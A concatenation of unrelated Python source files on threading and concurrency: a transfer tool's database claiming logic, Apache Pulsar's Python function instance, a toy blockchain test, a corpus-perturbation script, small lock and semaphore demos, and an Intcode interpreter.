def _preclaim_more_transfer(self, query):
'''
This is called from within a flush operation during the TRANSFER phase.
Lay claim to more objects.
'''
have = len(self._tobj_index)
have += len(self._pend_writing_data) + len(self._pend_writing_nodata) + len(self._pend_generating_dirs)
if (have > self._hiwat_count) and self._generating_dirs:
return
remaining = self._hiwat_count - have
remaining = min(remaining, self._preclaim_max_at_once)
query = query.filter(DbEntTargetObj.state == TargetObjState.PENDING)
# Something to think about: Should this query order by size, pulling largest first?
# That would require additional disk accesses to the DB to support the
# additional indexing required. If we start distributing the work across many
# threads on many nodes, this could become more important to reduce
# the likelihood that a small number of large objects appear at the end.
if remaining > 0:
query2 = query.filter(DbEntTargetObj.ftype > Ftype.DIR).filter(DbEntTargetObj.ftype <= Ftype.LNK).limit(remaining)
count = 0
for dbe in query2:
dbe.state = TargetObjState.WRITING
self._pend_writing_data.append(TargetObj.from_dbe(dbe))
count += 1
remaining -= count
if remaining > 0:
query2 = query.filter(DbEntTargetObj.ftype > Ftype.LNK).limit(remaining)
count = 0
for dbe in query2:
dbe.state = TargetObjState.WRITING
self._pend_writing_nodata.append(TargetObj.from_dbe(dbe))
count += 1
remaining -= count
# We want to retire leaves over dirs to keep down the size of the table.
# If we strictly prioritize leaves, we can introduce stalls when we wait
# to start generating a dir. Our caller (dbc_flush) will hint to get_one_*()
# when it would rather have a dir, but we want to be sure to keep at least some,
# even if that puts us one over the high-water mark.
dga = self.dirs_generating_min - len(self._generating_dirs)
remaining2 = max(remaining, dga)
if remaining2 > 0:
query2 = query.filter(DbEntTargetObj.ftype == Ftype.DIR).limit(remaining2)
count = 0
for dbe in query2:
dbe.state = TargetObjState.GENERATING
self._pend_generating_dirs.append(TargetObj.from_dbe(dbe))
count += 1
remaining -= count
def _preclaim_more_reconcile(self, db, session, query):
'''
This is called from within a flush operation during the RECONCILE phase.
Lay claim to more objects.
'''
remaining = self._hiwat_count - len(self._writing_inodes)
remaining = min(remaining, self._preclaim_max_at_once)
if remaining > 0:
query = query.filter(DbEntTargetObj.state == TargetObjState.INODE_PENDING)
query = query.limit(remaining)
bpquery = db.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
for dbe in query:
dbe.state = TargetObjState.INODE_WRITING
dbe.reconcile_vers = dbe.reconcile_vers + 1
tobj = TargetObj.from_dbe(dbe)
# The writer needs to know the backpointers and the accurate
# link count, so load them here.
if tobj.ftype != Ftype.DIR:
db.db_load_additional_backpointers_for_tobj(bpquery, tobj)
self._pend_writing_inodes.append(tobj)
def _preclaim_more_cleanup(self, query):
'''
This is called from within a flush operation during the CLEANUP phase.
Lay claim to more objects.
'''
remaining = self._hiwat_count - len(self._cleaning_inodes)
remaining = min(remaining, self._preclaim_max_at_once)
if remaining > 0:
query = query.filter(DbEntTargetObj.state == TargetObjState.INODE_CLEANUP_PENDING)
query = query.limit(remaining)
for dbe in query:
dbe.state = TargetObjState.INODE_CLEANUP_CLEANING
tobj = TargetObj.from_dbe(dbe)
self._pend_cleaning_inodes.append(tobj)
def pend_committed(self):
'''
Called from flush after the commit has completed. Caller
holds the dbc lock. Move pending updates to committed.
'''
# These are not global sorts by size across all pending objects -- only the ones we found.
# This biases us toward taking larger objects first without incurring extra DB overhead.
if self._pend_writing_data:
for tobj in self._pend_writing_data:
self._tobj_index[tobj.filehandle] = tobj
self._tobj_active.pop(tobj.filehandle, None)
self._writing_data.extend(self._pend_writing_data)
# Sort smallest to largest. When we pop in _get_one_transfer(),
# we take the largest first.
self._writing_data.sort(key=lambda tobj: tobj.size)
self._pend_writing_data = list()
for tobj in self._pend_writing_nodata:
self._tobj_index[tobj.filehandle] = tobj
self._writing_nodata.extend(self._pend_writing_nodata)
self._pend_writing_nodata = list()
if self._pend_generating_dirs:
for tobj in self._pend_generating_dirs:
self._tobj_index[tobj.filehandle] = tobj
self._generating_dirs.extend(self._pend_generating_dirs)
# Sort smallest to largest. When we pop in _get_one_transfer(),
# we take the largest first.
self._generating_dirs.sort(key=lambda tobj: tobj.size)
self._pend_generating_dirs = list()
self._writing_inodes.extend(self._pend_writing_inodes)
self._pend_writing_inodes = list()
self._cleaning_inodes.extend(self._pend_cleaning_inodes)
self._pend_cleaning_inodes = list()
def _get_one_transfer(self):
'''
Get one preclaimed item during the transfer phase.
'''
if self.want_more():
try:
ret = self._generating_dirs.pop()
self._tobj_index.pop(ret.filehandle, None)
self._tobj_active[ret.filehandle] = ret
return ret
except IndexError:
pass
try:
ret = self._writing_data.pop()
self._tobj_index.pop(ret.filehandle, None)
self._tobj_active[ret.filehandle] = ret
return ret
except IndexError:
pass
try:
ret = self._writing_nodata.pop()
self._tobj_index.pop(ret.filehandle, None)
self._tobj_active[ret.filehandle] = ret
return ret
except IndexError:
pass
try:
ret = self._generating_dirs.pop()
self._tobj_index.pop(ret.filehandle, None)
self._tobj_active[ret.filehandle] = ret
return ret
except IndexError:
pass
return None
def _get_one_reconcile(self):
'''
Get one preclaimed item during the reconcile phase.
'''
try:
return self._writing_inodes.pop()
except IndexError:
return None
def _get_one_cleanup(self):
'''
Get one preclaimed item during the cleanup phase.
'''
try:
return self._cleaning_inodes.pop()
except IndexError:
return None
class CLFSLoadDBThread(CLFSLoadThread):
'''
Class used for DB threads. No need to specialize
the class; this just helps other code (especially
test code) identify DB threads.
'''
# No specialization here
|
python_instance.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -*- encoding: utf-8 -*-
"""python_instance.py: Python Instance for running python functions
"""
import base64
import os
import signal
import time
try:
import Queue as queue
except ImportError:
import queue
import threading
import sys
import re
import pulsar
import contextimpl
import Function_pb2
import log
import util
import InstanceCommunication_pb2
# state dependencies
import state_context
from functools import partial
from collections import namedtuple
from function_stats import Stats
Log = log.Log
# Equivalent of the InstanceConfig in Java
InstanceConfig = namedtuple('InstanceConfig', 'instance_id function_id function_version function_details max_buffered_tuples')
# This is the message that the consumers put on the queue for the function thread to process
InternalMessage = namedtuple('InternalMessage', 'message topic serde consumer')
InternalQuitMessage = namedtuple('InternalQuitMessage', 'quit')
DEFAULT_SERIALIZER = "serde.IdentitySerDe"
PY3 = sys.version_info[0] >= 3
def base64ify(bytes_or_str):
if PY3 and isinstance(bytes_or_str, str):
input_bytes = bytes_or_str.encode('utf8')
else:
input_bytes = bytes_or_str
output_bytes = base64.urlsafe_b64encode(input_bytes)
if PY3:
return output_bytes.decode('ascii')
else:
return output_bytes
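# For example, base64ify("abc") and base64ify(b"abc") both yield the URL-safe
# encoding "YWJj" (returned as str on Python 3 and bytes on Python 2).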
class PythonInstance(object):
def __init__(self,
instance_id,
function_id,
function_version,
function_details,
max_buffered_tuples,
expected_healthcheck_interval,
user_code,
pulsar_client,
secrets_provider,
cluster_name,
state_storage_serviceurl):
self.instance_config = InstanceConfig(instance_id, function_id, function_version, function_details, max_buffered_tuples)
self.user_code = user_code
# Set the queue size to one since consumers already have internal queues; the queue
# only hands messages from the consumers to the processing thread.
self.queue = queue.Queue(1)
self.log_topic_handler = None
if function_details.logTopic is not None and function_details.logTopic != "":
self.log_topic_handler = log.LogTopicHandler(str(function_details.logTopic), pulsar_client)
self.pulsar_client = pulsar_client
self.state_storage_serviceurl = state_storage_serviceurl
self.input_serdes = {}
self.consumers = {}
self.output_serde = None
self.function_class = None
self.function_purefunction = None
self.producer = None
self.execution_thread = None
self.atmost_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATMOST_ONCE')
self.atleast_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATLEAST_ONCE')
self.auto_ack = self.instance_config.function_details.autoAck
self.contextimpl = None
self.last_health_check_ts = time.time()
self.timeout_ms = function_details.source.timeoutMs if function_details.source.timeoutMs > 0 else None
self.expected_healthcheck_interval = expected_healthcheck_interval
self.secrets_provider = secrets_provider
self.state_context = state_context.NullStateContext()
self.metrics_labels = [function_details.tenant,
"%s/%s" % (function_details.tenant, function_details.namespace),
function_details.name,
instance_id, cluster_name,
"%s/%s/%s" % (function_details.tenant, function_details.namespace, function_details.name)]
self.stats = Stats(self.metrics_labels)
def health_check(self):
self.last_health_check_ts = time.time()
health_check_result = InstanceCommunication_pb2.HealthCheckResult()
health_check_result.success = True
return health_check_result
def process_spawner_health_check_timer(self):
if time.time() - self.last_health_check_ts > self.expected_healthcheck_interval * 3:
Log.critical("Haven't received health check from spawner in a while. Stopping instance...")
os.kill(os.getpid(), signal.SIGKILL)
sys.exit(1)
def run(self):
# Setup state
self.state_context = self.setup_state()
# Setup consumers and input deserializers
mode = pulsar._pulsar.ConsumerType.Shared
if self.instance_config.function_details.source.subscriptionType == Function_pb2.SubscriptionType.Value("FAILOVER"):
mode = pulsar._pulsar.ConsumerType.Failover
subscription_name = str(self.instance_config.function_details.tenant) + "/" + \
str(self.instance_config.function_details.namespace) + "/" + \
str(self.instance_config.function_details.name)
properties = util.get_properties(util.getFullyQualifiedFunctionName(
self.instance_config.function_details.tenant,
self.instance_config.function_details.namespace,
self.instance_config.function_details.name),
self.instance_config.instance_id)
for topic, serde in self.instance_config.function_details.source.topicsToSerDeClassName.items():
if not serde:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), serde)
self.input_serdes[topic] = serde_kclass()
Log.debug("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None,
properties=properties
)
for topic, consumer_conf in self.instance_config.function_details.source.inputSpecs.items():
if not consumer_conf.serdeClassName:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), consumer_conf.serdeClassName)
self.input_serdes[topic] = serde_kclass()
Log.debug("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
consumer_args = {
"consumer_type": mode,
"message_listener": partial(self.message_listener, self.input_serdes[topic]),
"unacked_messages_timeout_ms": int(self.timeout_ms) if self.timeout_ms else None,
"properties": properties
}
if consumer_conf.HasField("receiverQueueSize"):
consumer_args["receiver_queue_size"] = consumer_conf.receiverQueueSize.value
if consumer_conf.isRegexPattern:
self.consumers[topic] = self.pulsar_client.subscribe(
re.compile(str(topic)), subscription_name,
**consumer_args
)
else:
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
**consumer_args
)
function_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.className)
if function_kclass is None:
Log.critical("Could not import User Function Module %s" % self.instance_config.function_details.className)
raise NameError("Could not import User Function Module %s" % self.instance_config.function_details.className)
try:
self.function_class = function_kclass()
except:
self.function_purefunction = function_kclass
self.contextimpl = contextimpl.ContextImpl(self.instance_config, Log, self.pulsar_client,
self.user_code, self.consumers,
self.secrets_provider, self.metrics_labels,
self.state_context, self.stats)
# Now launch a thread that does execution
self.execution_thread = threading.Thread(target=self.actual_execution)
self.execution_thread.start()
# start process spawner health check timer
self.last_health_check_ts = time.time()
if self.expected_healthcheck_interval > 0:
timer = util.FixedTimer(self.expected_healthcheck_interval, self.process_spawner_health_check_timer, name="health-check-timer")
timer.start()
def actual_execution(self):
Log.debug("Started Thread for executing the function")
while True:
# msg starts as None so the error path below can safely test it even if
# queue.get() itself raises before a message is assigned
msg = None
try:
msg = self.queue.get(True)
if isinstance(msg, InternalQuitMessage):
break
Log.debug("Got a message from topic %s" % msg.topic)
# deserialize message
input_object = msg.serde.deserialize(msg.message.data())
# set current message in context
self.contextimpl.set_current_message_context(msg.message, msg.topic)
output_object = None
self.saved_log_handler = None
if self.log_topic_handler is not None:
self.saved_log_handler = log.remove_all_handlers()
log.add_handler(self.log_topic_handler)
successfully_executed = False
try:
# get user function start time for statistic calculation
self.stats.set_last_invocation(time.time())
# start timer for process time
self.stats.process_time_start()
if self.function_class is not None:
output_object = self.function_class.process(input_object, self.contextimpl)
else:
output_object = self.function_purefunction.process(input_object)
successfully_executed = True
# stop timer for process time
self.stats.process_time_end()
except Exception as e:
Log.exception("Exception while executing user method")
self.stats.incr_total_user_exceptions(e)
# If function throws exception then send neg ack for input message back to broker
msg.consumer.negative_acknowledge(msg.message)
if self.log_topic_handler is not None:
log.remove_all_handlers()
log.add_handler(self.saved_log_handler)
if successfully_executed:
self.process_result(output_object, msg)
self.stats.incr_total_processed_successfully()
except Exception as e:
Log.error("Uncaught exception in Python instance: %s" % e);
self.stats.incr_total_sys_exceptions(e)
if msg:
msg.consumer.negative_acknowledge(msg.message)
def done_producing(self, consumer, orig_message, topic, result, sent_message):
if result == pulsar.Result.Ok:
if self.auto_ack:
consumer.acknowledge(orig_message)
else:
error_msg = "Failed to publish to topic [%s] with error [%s] with src message id [%s]" % (topic, result, orig_message.message_id())
Log.error(error_msg)
self.stats.incr_total_sys_exceptions(Exception(error_msg))
# If producer fails send output then send neg ack for input message back to broker
consumer.negative_acknowledge(orig_message)
def process_result(self, output, msg):
if output is not None and self.instance_config.function_details.sink.topic is not None and \
len(self.instance_config.function_details.sink.topic) > 0:
if self.output_serde is None:
self.setup_output_serde()
if self.producer is None:
self.setup_producer()
# serialize function output
output_bytes = self.output_serde.serialize(output)
if output_bytes is not None:
props = {"__pfn_input_topic__" : str(msg.topic), "__pfn_input_msg_id__" : base64ify(msg.message.message_id().serialize())}
self.producer.send_async(output_bytes, partial(self.done_producing, msg.consumer, msg.message, self.producer.topic()), properties=props)
elif self.auto_ack and self.atleast_once:
msg.consumer.acknowledge(msg.message)
def setup_output_serde(self):
if self.instance_config.function_details.sink.serDeClassName is not None and \
len(self.instance_config.function_details.sink.serDeClassName) > 0:
serde_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.sink.serDeClassName)
self.output_serde = serde_kclass()
else:
global DEFAULT_SERIALIZER
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
self.output_serde = serde_kclass()
def setup_producer(self):
if self.instance_config.function_details.sink.topic is not None and \
len(self.instance_config.function_details.sink.topic) > 0:
Log.debug("Setting up producer for topic %s" % self.instance_config.function_details.sink.topic)
batch_type = pulsar.BatchingType.Default
if self.instance_config.function_details.sink.producerSpec.batchBuilder is not None and \
len(self.instance_config.function_details.sink.producerSpec.batchBuilder) > 0:
batch_builder = self.instance_config.function_details.sink.producerSpec.batchBuilder
if batch_builder == "KEY_BASED":
batch_type = pulsar.BatchingType.KeyBased
self.producer = self.pulsar_client.create_producer(
str(self.instance_config.function_details.sink.topic),
block_if_queue_full=True,
batching_enabled=True,
batching_type=batch_type,
batching_max_publish_delay_ms=10,
compression_type=pulsar.CompressionType.LZ4,
# set send timeout to be infinity to prevent potential deadlock with consumer
# that might happen when consumer is blocked due to unacked messages
send_timeout_millis=0,
properties=util.get_properties(util.getFullyQualifiedFunctionName(
self.instance_config.function_details.tenant,
self.instance_config.function_details.namespace,
self.instance_config.function_details.name),
self.instance_config.instance_id)
)
def setup_state(self):
table_ns = "%s_%s" % (str(self.instance_config.function_details.tenant),
str(self.instance_config.function_details.namespace))
table_ns = table_ns.replace("-", "_")
table_name = str(self.instance_config.function_details.name)
return state_context.create_state_context(self.state_storage_serviceurl, table_ns, table_name)
def message_listener(self, serde, consumer, message):
# increment number of received records from source
self.stats.incr_total_received()
item = InternalMessage(message, message.topic_name(), serde, consumer)
self.queue.put(item, True)
if self.atmost_once and self.auto_ack:
consumer.acknowledge(message)
def get_and_reset_metrics(self):
# First get any user metrics
metrics = self.get_metrics()
self.reset_metrics()
return metrics
def reset_metrics(self):
self.stats.reset()
self.contextimpl.reset_metrics()
def get_metrics(self):
total_received = self.stats.get_total_received()
total_processed_successfully = self.stats.get_total_processed_successfully()
total_user_exceptions = self.stats.get_total_user_exceptions()
total_sys_exceptions = self.stats.get_total_sys_exceptions()
avg_process_latency_ms = self.stats.get_avg_process_latency()
last_invocation = self.stats.get_last_invocation()
total_received_1min = self.stats.get_total_received_1min()
total_processed_successfully_1min = self.stats.get_total_processed_successfully_1min()
total_user_exceptions_1min = self.stats.get_total_user_exceptions_1min()
total_sys_exceptions_1min = self.stats.get_total_sys_exceptions_1min()
avg_process_latency_ms_1min = self.stats.get_avg_process_latency_1min()
metrics_data = InstanceCommunication_pb2.MetricsData()
# total metrics
metrics_data.receivedTotal = int(total_received) if sys.version_info.major >= 3 else long(total_received)
metrics_data.processedSuccessfullyTotal = int(total_processed_successfully) if sys.version_info.major >= 3 else long(total_processed_successfully)
metrics_data.systemExceptionsTotal = int(total_sys_exceptions) if sys.version_info.major >= 3 else long(total_sys_exceptions)
metrics_data.userExceptionsTotal = int(total_user_exceptions) if sys.version_info.major >= 3 else long(total_user_exceptions)
metrics_data.avgProcessLatency = avg_process_latency_ms
metrics_data.lastInvocation = int(last_invocation) if sys.version_info.major >= 3 else long(last_invocation)
# 1min metrics
metrics_data.receivedTotal_1min = int(total_received_1min) if sys.version_info.major >= 3 else long(total_received_1min)
metrics_data.processedSuccessfullyTotal_1min = int(
total_processed_successfully_1min) if sys.version_info.major >= 3 else long(total_processed_successfully_1min)
metrics_data.systemExceptionsTotal_1min = int(total_sys_exceptions_1min) if sys.version_info.major >= 3 else long(
total_sys_exceptions_1min)
metrics_data.userExceptionsTotal_1min = int(total_user_exceptions_1min) if sys.version_info.major >= 3 else long(
total_user_exceptions_1min)
metrics_data.avgProcessLatency_1min = avg_process_latency_ms_1min
# get any user metrics
user_metrics = self.contextimpl.get_metrics()
for metric_name, value in user_metrics.items():
metrics_data.userMetrics[metric_name] = value
return metrics_data
def add_system_metrics(self, metric_name, value, metrics):
metrics.metrics[metric_name].count = value
metrics.metrics[metric_name].sum = value
metrics.metrics[metric_name].min = 0
metrics.metrics[metric_name].max = value
def get_function_status(self):
status = InstanceCommunication_pb2.FunctionStatus()
status.running = True
total_received = self.stats.get_total_received()
total_processed_successfully = self.stats.get_total_processed_successfully()
total_user_exceptions = self.stats.get_total_user_exceptions()
total_sys_exceptions = self.stats.get_total_sys_exceptions()
avg_process_latency_ms = self.stats.get_avg_process_latency()
last_invocation = self.stats.get_last_invocation()
status.numReceived = int(total_received) if sys.version_info.major >= 3 else long(total_received)
status.numSuccessfullyProcessed = int(total_processed_successfully) if sys.version_info.major >= 3 else long(total_processed_successfully)
status.numUserExceptions = int(total_user_exceptions) if sys.version_info.major >= 3 else long(total_user_exceptions)
status.instanceId = self.instance_config.instance_id
for ex, tm in self.stats.latest_user_exception:
to_add = status.latestUserExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.numSystemExceptions = int(total_sys_exceptions) if sys.version_info.major >= 3 else long(total_sys_exceptions)
for ex, tm in self.stats.latest_sys_exception:
to_add = status.latestSystemExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.averageLatency = avg_process_latency_ms
status.lastInvocationTime = int(last_invocation) if sys.version_info.major >= 3 else long(last_invocation)
return status
def join(self):
self.queue.put(InternalQuitMessage(True), True)
self.execution_thread.join()
self.close()
def close(self):
Log.info("Closing python instance...")
if self.producer:
self.producer.close()
if self.consumers:
for consumer in self.consumers.values():
try:
consumer.close()
except:
pass
if self.pulsar_client:
self.pulsar_client.close()
|
blockchain_test.py
|
import threading
import time
from time import sleep
from blockchain.blockchain_manager import BlockchainManager
from blockchain.block_builder import BlockBuilder
from transaction.transaction_pool import TransactionPool
# How often (in seconds) to check the TransactionPool
CHECK_INTERVAL = 10
FLAG_STOP_BLOCK_BUILD = False
def start_thread(tp, bb, bm, prev_block_hash):
t = threading.Thread(target=generate_block_with_tp, args=(tp, bb, bm, prev_block_hash))
t.start()
def generate_block_with_tp(tp, bb, bm, prev_block_hash):
t = time.time()
is_first = True # generate a block right after startup, on the first loop only
print('Thread for generate_block_with_tp started!')
global FLAG_STOP_BLOCK_BUILD
while True:
if not FLAG_STOP_BLOCK_BUILD:
if time.time() - t > CHECK_INTERVAL or is_first:
result = tp.get_stored_transactions()
if result is not None:
new_block = bb.generate_new_block(result, prev_block_hash)
bm.set_new_block(new_block.to_dict())
prev_block_hash = bm.get_hash(new_block.to_dict())
# clear the Transaction Pool once block generation succeeds
index = len(result)
tp.clear_my_transactions(index)
else:
print('Transaction Pool is empty ...')
print('Current Blockchain is ... ', bm.chain)
print('Current prev_block_hash is ... ', prev_block_hash)
if is_first:
is_first = False
t = time.time()
else:
print('Thread for generate_block_with_tp is stopped now')
break
def main():
global FLAG_STOP_BLOCK_BUILD
bb = BlockBuilder()
my_genesis_block = bb.generate_genesis_block()
bm = BlockchainManager(my_genesis_block.to_dict())
tp = TransactionPool()
prev_block_hash = bm.get_hash(my_genesis_block.to_dict())
print('genesis_block_hash :' , prev_block_hash)
transaction = {
'sender': 'test1',
'recipient': 'test2',
'value' : 3
}
tp.set_new_transaction(transaction)
transaction2 = {
'sender': 'test1',
'recipient': 'test3',
'value' : 2
}
tp.set_new_transaction(transaction2)
start_thread(tp, bb, bm, prev_block_hash)
sleep(10)
transaction3 = {
'sender': 'test5',
'recipient': 'test6',
'value' : 10
}
tp.set_new_transaction(transaction3)
sleep(30)
print('Stop the Thread for generate_block_with_tp')
FLAG_STOP_BLOCK_BUILD = True
sleep(10)
FLAG_STOP_BLOCK_BUILD = False
start_thread(tp, bb, bm, prev_block_hash)
if __name__ == '__main__':
main()
|
setup_perturbed_snapshots.py
|
from multiprocessing import Queue, Process
from argparse import ArgumentParser
import ioutils
import copy
from scipy.stats import bernoulli
def worker(proc_num, queue, corpus, donor_list, donor_occuarances_map, receptor_list, word_freq, preplacement, out_dir, out_suffix):
while True:
if queue.empty():
break
year = queue.get()
print proc_num, "Creating snapshot for year", year
new_corpus = copy.copy(corpus)
n = len(donor_list)
for i in range(n):
d = donor_list[i]
perturb_word_in_corpus(new_corpus, d, donor_occuarances_map[d], receptor_list[i],
word_freq[donor_list[i]], preplacement)
print proc_num, "Write snapshot for year", year
write_snapshot(year, out_dir, out_suffix, new_corpus)
print proc_num, "Finished"
def perturb_word_in_corpus(corpus, donor, donor_occuarances, receptor, donor_count, preplacement):
data_bern = bernoulli.rvs(size=donor_count, p=preplacement)
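# Each entry of data_bern is 1 with probability preplacement, so on average
# preplacement * donor_count occurrences of the donor word are replaced below.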
# donor_idx = 0
for idx, p in enumerate(data_bern):
if p == 1:
corpus[donor_occuarances[idx]] = receptor
# for idx, w in enumerate(corpus):
# if w == donor:
# if data_bern[donor_idx] == 1:
# corpus[idx] = receptor
# donor_idx += 1
def write_snapshot(year, out_dir, out_suffix, corpus):
with open(out_dir + str(year) + out_suffix, 'w') as outfile:
outfile.write(' '.join(corpus) + "\n")
def run_parallel(workers, years, corpus, donor_list, donor_occuarances_map, receptor_list, word_freq, preplacement, out_dir, out_suffix):
queue = Queue()
for year in years:
queue.put(year)
procs = [Process(target=worker, args=[i, queue, corpus, donor_list, donor_occuarances_map, receptor_list, word_freq, preplacement, out_dir, out_suffix]) for i in range(workers)]
for p in procs:
p.start()
for p in procs:
p.join()
def read_corpus_to_list(corpus_file_path):
with open(corpus_file_path) as f:
return [word for line in f for word in line.split()]
def read_word_freq(word_freq_path):
word_count_map = {}
with open(word_freq_path) as f:
for line in f:
(key, val) = line.split()
word_count_map[key] = int(val)
return word_count_map
def get_donor_occurances(corpus, donor_list):
print "Setting donor occurances map"
donor_set = set(donor_list)
donor_occuarances_map = {}
for idx, w in enumerate(corpus):
if w in donor_set:
if w not in donor_occuarances_map:
donor_occuarances_map[w] = []
donor_occuarances_map[w].append(idx)
return donor_occuarances_map
if __name__ == "__main__":
parser = ArgumentParser("Setup perturbed snapshots from corpus")
parser.add_argument("corpus_file_path", help="path to raw data corpus")
parser.add_argument("donor_list_path", help="path to donor words")
parser.add_argument("receptor_list_path", help="path to receptor words")
parser.add_argument("word_freq_path", help="path to words freq of corpus")
parser.add_argument("out_dir", help="out directory")
parser.add_argument("out_suffix", help="suffix used to name")
parser.add_argument("--preplacement", type=float, help="success probability", default=0.1)
parser.add_argument("--workers", type=int, help="Number of processes to spawn", default=8)
parser.add_argument("--start-year", type=int, help="start year (inclusive)", default=1900)
parser.add_argument("--end-year", type=int, help="end year (inclusive)", default=1990)
parser.add_argument("--year-inc", type=int, help="year increment", default=10)
args = parser.parse_args()
years = range(args.start_year, args.end_year + 1, args.year_inc)
ioutils.mkdir(args.out_dir)
corpus = read_corpus_to_list(args.corpus_file_path)
donor_list = ioutils.load_word_list(args.donor_list_path)
donor_occuarances_map = get_donor_occurances(corpus, donor_list)
run_parallel(args.workers, years, corpus, donor_list, donor_occuarances_map,
ioutils.load_word_list(args.receptor_list_path), read_word_freq(args.word_freq_path),
args.preplacement, args.out_dir + "/", args.out_suffix)
|
semaphore.py
|
import threading
import time
sem = threading.Semaphore()
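# threading.Semaphore() defaults to an initial value of 1, so here it acts as a
# simple mutex serializing the print calls in the two loops below.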
def fun1():
while True:
sem.acquire()
print(1)
sem.release()
time.sleep(0.25)
def fun2():
while True:
sem.acquire()
print(2)
sem.release()
time.sleep(0.5)
t = threading.Thread(target = fun1)
t.start()
t2 = threading.Thread(target = fun2)
t2.start()
|
main.py
|
#!/usr/bin/env python3
import operator
import sys
from queue import Queue
from threading import Thread
class Memory(list):
def __getitem__(self, index):
if index >= len(self):
self.extend([0] * (index - len(self) + 1))
return super(Memory, self).__getitem__(index)
def __setitem__(self, index, value):
if index >= len(self):
self.extend([0] * (index - len(self) + 1))
return super(Memory, self).__setitem__(index, value)
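# Memory grows on demand: e.g. Memory([1, 2])[5] pads the list with zeros out to
# index 5 and returns 0, which suits Intcode programs that address memory beyond
# the initial program.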
class Intcode:
def __init__(self, mem, inq, outq):
self.mem = Memory(mem)
self.pc = 0
self.rel_base = 0
self.inq = inq
self.outq = outq
self.halted = False
self.last_output = 0
def _run(self):
while not self.halted:
opcode = self.mem[self.pc]
ins = Instruction(opcode)
off = ins.run(self)
if off is None:
self.halted = True
else:
self.pc += off
def run(self):
t = Thread(target=self._run, args=())
t.start()
return t
class Instruction:
def __init__(self, opcode):
d = 10000
m3, opcode, d = opcode // d, opcode % d, d // 10
m2, opcode, d = opcode // d, opcode % d, d // 10
m1, opcode, d = opcode // d, opcode % d, d // 10
self.modes = [m1, m2, m3]
self.opcode = opcode
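# e.g. opcode 1002 decodes to opcode=2 (mul) with modes=[0, 1, 0]:
# first parameter positional, second immediate, third positional.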
def load(self, m, arg):
mode = self.modes[arg]
addr = m.pc + arg + 1
if mode == 0:
return m.mem[m.mem[addr]]
elif mode == 1:
return m.mem[addr]
elif mode == 2:
return m.mem[m.rel_base + m.mem[addr]]
else:
raise Exception("Invalid parameter mode")
def store(self, m, arg, value):
mode = self.modes[arg]
addr = m.pc + arg + 1
if mode == 0:
m.mem[m.mem[addr]] = value
elif mode == 2:
m.mem[m.rel_base + m.mem[addr]] = value
else:
raise Exception("Invalid parameter mode")
def _alu(self, m, f):
a = self.load(m, 0)
b = self.load(m, 1)
self.store(m, 2, f(a, b))
return 4
def add(self, m):
return self._alu(m, operator.add)
def mul(self, m):
return self._alu(m, operator.mul)
def lt(self, m):
return self._alu(m, lambda a, b: 1 if a < b else 0)
def eq(self, m):
return self._alu(m, lambda a, b: 1 if a == b else 0)
def _jmp(self, m, f):
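# When f(a) is truthy, return b - pc so the caller's pc += offset lands
# exactly on b; otherwise skip past this 3-cell jump instruction.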
a = self.load(m, 0)
b = self.load(m, 1)
return b - m.pc if f(a) else 3
def jnz(self, m):
return self._jmp(m, lambda a: a)
def jz(self, m):
return self._jmp(m, lambda a: not a)
def read(self, m):
self.store(m, 0, m.inq.get())
return 2
def write(self, m):
a = self.load(m, 0)
m.outq.put(a)
m.last_output = a
return 2
def set_base(self, m):
a = self.load(m, 0)
m.rel_base += a
return 2
def halt(self, m):
return None
def run(self, m):
operations = {
1: self.add,
2: self.mul,
3: self.read,
4: self.write,
5: self.jnz,
6: self.jz,
7: self.lt,
8: self.eq,
9: self.set_base,
99: self.halt,
}
return operations[self.opcode](m)
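# run_boost runs a fresh machine on its own thread, feeds it a single input value
# and returns the first value the program writes to its output queue.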
def run_boost(mem, value):
inq = Queue()
outq = Queue()
m = Intcode(mem.copy(), inq, outq)
t = m.run()
inq.put(value)
t.join()
return outq.get()
def main(argv):
with open(argv[1], "r") as f:
mem = [int(n) for n in f.read().split(",")]
print(run_boost(mem, 1))
print(run_boost(mem, 2))
if __name__ == "__main__":
main(sys.argv)
|
luck.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import time, threading
balance = 0
lock = threading.Lock()
# Code executed by the new thread:
def loop():
print('thread %s is running...' % threading.current_thread().name)
n = 0
global balance
while n < 5:
n = n + 1
lock.acquire()
balance = balance + 1
print('thread %s >>> %s balance %d' % (threading.current_thread().name, n, balance))
lock.release()
print('thread %s ended.' % threading.current_thread().name)
print('thread %s is running...' % threading.current_thread().name)
t1 = threading.Thread(target = loop, name = 'LoopThread1')
t2 = threading.Thread(target = loop, name = 'LoopThread2')
t1.start()
t2.start()
t1.join()
t2.join()
print('thread %s ended.' % threading.current_thread().name)
|
thinc_worker.py
|
"""
PyTorch version: https://github.com/pytorch/examples/blob/master/mnist/main.py
